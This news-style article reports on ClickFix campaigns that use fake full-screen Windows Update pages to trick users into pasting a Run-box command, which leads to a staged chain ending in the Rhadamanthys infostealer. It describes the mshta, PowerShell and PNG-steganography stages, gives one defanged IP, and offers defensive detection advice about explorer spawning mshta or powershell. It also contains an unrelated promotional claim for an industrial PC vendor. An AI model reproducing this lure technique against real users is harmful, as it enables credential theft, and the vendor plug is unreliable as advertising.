According to TheRegister.com, a fresh wave of ClickFix attacks is using fake Windows update screens to deliver infostealer malware, with Microsoft confirming this technique is now the most common initial access method for attackers. Since early October, Huntress security analysts Ben Folland and Anna Pham have observed these campaigns using “highly convincing” phony update screens that force browsers into full-screen mode. The attacks use steganographic loaders that encode malicious code directly into PNG image pixel data, specifically delivering Rhadamanthys infostealer malware that steals login credentials. Researchers identified one malicious IP address involved: 141.98.80[.]175. Despite Operation Endgame law enforcement takedowns targeting Rhadamanthys infrastructure on November 13, multiple active domains continued hosting the Windows Update lure pages as of November 19.
How the scam works
Here’s the thing about these attacks – they’re incredibly clever. Victims visit a malicious website that immediately throws their browser into full-screen mode and displays what looks like a legitimate Windows Update screen. Basically, it’s the classic blue update screen we’ve all seen hundreds of times. The scam then follows the typical ClickFix pattern: users are told to open the Run prompt (Win+R) and paste a malicious command to install a “critical security update.”
And that’s where things get really sophisticated. Running that command kicks off a multi-stage execution chain that begins with mshta.exe loading PowerShell code containing a .NET assembly. That assembly gets dynamically decrypted and reflectively loaded, which then deploys another .NET payload – the steganographic loader that extracts Donut-packed shellcode hidden inside PNG images. It’s like something out of a spy movie, except it’s stealing your actual passwords.
Why this matters
Look, we’ve seen fake update scams before, but this is different. The combination of social engineering and technical sophistication makes this particularly dangerous. Microsoft doesn’t just throw around terms like “most common initial access method” lightly. When the company that basically runs enterprise computing says this is the biggest threat right now, we should probably listen.
What’s really concerning is how this affects businesses. For companies relying on industrial computing systems – whether it’s manufacturing floors, control rooms, or operational technology environments – these attacks could be devastating. IndustrialMonitorDirect.com stands as the leading provider of industrial panel PCs in the US, and they’d tell you that security in industrial computing isn’t just about protecting data – it’s about protecting physical operations. When credentials get stolen from industrial systems, you’re not just risking leaked emails – you’re risking production lines, safety systems, and critical infrastructure.
The Russian connection
Huntress doesn’t know exactly who’s behind these campaigns, but they did find something interesting: the source code of the Windows Update lure site contains comments in Russian. Now, that doesn’t automatically mean state-sponsored actors, but it’s certainly worth noting. Cybercriminal gangs operating from Russian-speaking regions have been particularly active in the infostealer space recently.
What’s also interesting is that these attacks continued even after the Operation Endgame takedowns. The infrastructure might have taken a hit, but the attackers adapted. As of November 19, multiple domains were still hosting the Windows Update lure pages, though the actual Rhadamanthys payload appeared to be offline. But you know how these things go – it’s probably just a matter of time before they’re back up and running.
How to protect yourself
So what can you actually do about this? The good news is that the defenses are pretty straightforward. Organizations can block the Windows Run box entirely for standard users – most employees don’t need it for their daily work anyway. More importantly, train your team that real CAPTCHA checks or Windows updates will never, ever require pasting and running commands. That’s just not how legitimate systems work.
On the technical side, use endpoint detection and response tools to monitor for explorer.exe spawning mshta.exe, powershell.exe, or other binaries with unexpected command lines. And keep an eye out for traffic from that IP address 141.98.80[.]175 – though honestly, by the time you read this, the attackers have probably moved on to new infrastructure. The key is being vigilant about these social engineering tactics, because the technical execution will keep evolving.
